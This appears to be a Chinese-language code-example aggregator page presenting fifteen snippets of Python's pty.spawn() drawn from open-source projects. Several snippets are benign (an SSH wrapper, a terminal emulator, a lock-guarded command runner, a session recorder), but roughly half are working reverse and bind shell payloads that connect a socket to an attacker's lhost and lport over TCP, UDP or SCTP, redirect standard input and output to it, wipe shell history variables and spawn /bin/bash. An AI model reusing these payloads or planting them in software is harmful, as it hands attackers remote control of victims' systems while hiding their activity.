我们从Python开源项目中,提取了以下15个代码示例,用于说明如何使用pty.spawn()。
def connect(srv_model, ctx): ssh_command = shutil.which("ssh") if not ssh_command: raise ValueError("Cannot find ssh command") ssh_command = [ssh_command] ssh_command.append("-4") ssh_command.append("-tt") ssh_command.append("-x") ssh_command.extend(("-o", "UserKnownHostsFile=/dev/null")) ssh_command.extend(("-o", "StrictHostKeyChecking=no")) ssh_command.extend(("-l", srv_model.username)) ssh_command.extend(("-i", ctx.obj["identity_file"])) ssh_command.extend(ctx.obj["ssh_args"]) ssh_command.append(srv_model.ip) LOG.debug("Execute %s", ssh_command) pty.spawn(ssh_command)
def spawn(self, argv): ''' Create a spawned process. Based on the code for pty.spawn(). ''' assert self.master_fd is None assert isinstance(argv, list) pid, master_fd = pty.fork() self.master_fd = master_fd if pid == pty.CHILD: os.execlp(argv[0], *argv) # and not ever returned self._init() try: self._copy() # start communication except Exception: # unexpected errors self._del() raise self._del() return self.log.decode()
def startEmulator(self): pty.spawn(self.shell, self.outputCallback, self.inputCallback)
def ptyShell(action, sock): # #platformshells = { # 'win': 'cmd.exe', # 'mac': '/bin/bash', # 'nix': '/bin/bash', # 'unk': '' # } # shellExe = platformshells[plat] shellExe = '/bin/bash' #preparing oldin = os.dup(0) oldout = os.dup(1) olderr = os.dup(2) os.dup2(sock.fileno(),0) os.dup2(sock.fileno(),1) os.dup2(sock.fileno(),2) #os.putenv("HISTFILE",'/dev/null') #Shellz! pty.spawn(shellExe) # cleanup os.dup2(oldin,0) os.dup2(oldout,1) os.dup2(olderr,2)
def spawn(self, argv=None): ''' Create a spawned process. Based on the code for pty.spawn(). ''' assert self.master_fd is None pid, master_fd = pty.fork() self.master_fd = master_fd self.pid = pid if pid == pty.CHILD: if self.user is not None: try: uid = pwd.getpwnam(self.user).pw_uid except KeyError: log.error("No such user: %s", self.user) else: os.setuid(uid) log.debug('switched user for remote process to %s(%s)', self.user, uid) if self.group is not None: try: gid = grp.getgrnam(self.group).gr_gid except KeyError: log.error("No such group: %s", self.group) else: os.setgid(gid) log.debug('switched group for remote process to %s(%s)', self.group, gid) if not argv: argv = [os.environ['SHELL']] os.execlp(argv[0], *argv) # Previous command replaces the process return self._init_fd() try: self._copy() except (IOError, OSError): pass os.close(master_fd) self.master_fd = None
def mongolock_cli(): @configure def main(): parser = argparse.ArgumentParser( description="Run program, acquiring the lock in MongoDB" ) parser.add_argument( "-l", "--lockname", help="Name of the lock", required=True ) parser.add_argument( "-b", "--block", help="Block execution till lock will be available", action="store_true", default=False ) parser.add_argument( "-t", "--timeout", help="Timeout for blocking", type=int, default=None ) parser.add_argument( "command", help="Command to run", nargs=argparse.ONE_OR_MORE, ) options = parser.parse_args() locked = lock.with_autoprolong_lock( options.lockname, block=options.block, timeout=options.timeout) with locked: pty.spawn(options.command) return main()
def main(): if len(sys.argv) !=3: usage(sys.argv[0]) sys.exit() s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((sys.argv[1],int(sys.argv[2]))) print 'connect ok' except: print 'connect faild' sys.exit() os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) global shell os.unsetenv("HISTFILE") os.unsetenv("HISTFILESIZE") os.unsetenv("HISTSIZE") os.unsetenv("HISTORY") os.unsetenv("HISTSAVE") os.unsetenv("HISTZONE") os.unsetenv("HISTLOG") os.unsetenv("HISTCMD") os.putenv("HISTFILE",'/dev/null') os.putenv("HISTSIZE",'0') os.putenv("HISTFILESIZE",'0') pty.spawn(shell) s.close()
def _delay_for_pipe(self, env=None, delay=None): # This delay is sometimes needed because the temporary stdin file that # is being written (the pipe) may not have even hits its first flush() # call by the time the spawned process starts up and determines there # is nothing in the file. The spawn can thus exit, without doing any # real work. Consider the case of piping something into grep: # # $ ps aux | grep root # # grep will exit on EOF and so there is a race between the buffersize # and flushing the temporary file and grep. However, this race is not # always meaningful. Pagers, for example, update when the file is written # to. So what is important is that we start the spawned process ASAP: # # $ ps aux | less # # So there is a push-and-pull between the the competing objectives of # not blocking and letting the spawned process have enough to work with # such that it doesn't exit prematurely. Unfortunately, there is no # way to know a priori how big the file is, how long the spawned process # will run for, etc. Thus as user-definable delay let's the user # find something that works for them. if delay is None: delay = (env or os.environ).get('TEEPTY_PIPE_DELAY', -1.0) delay = float(delay) if 0.0 < delay: time.sleep(delay)
def run_interactive(cmd): status = 'success' result = None print('Recording {}. Send EOF (^D) to end.'.format(cmd), end='\n\n') # This is mostly taken from the stdlib's `pty` docs with io.BytesIO() as script: def read(fd): data = os.read(fd, 1024) script.write(data) return data # TODO: update this with try/except clauses as we find exceptions pty.spawn(cmd, read) try: result = script.getvalue().decode(encoding='utf-8') except UnicodeDecodeError: result = script.getvalue().decode(encoding='cp437') print('\nSubmission recording completed.') runagain = input('Do you want to run the submission again? [y/N]: ') again = runagain.lower().startswith('y') return (status, result, again)
def main(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.bind(('', lport)) s.listen(1) (rem, addr) = s.accept() os.dup2(rem.fileno(),0) os.dup2(rem.fileno(),1) os.dup2(rem.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close()
def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((lhost, lport)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close()
def main(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect((lhost, lport)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close()
def main(): s = sctpsocket_tcp(socket.AF_INET) s.connect((lhost, lport)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close()
def main(): s = sctpsocket_tcp(socket.AF_INET) s.bind(('', lport)) s.listen(1) (rem, addr) = s.accept() os.dup2(rem.fileno(),0) os.dup2(rem.fileno(),1) os.dup2(rem.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close()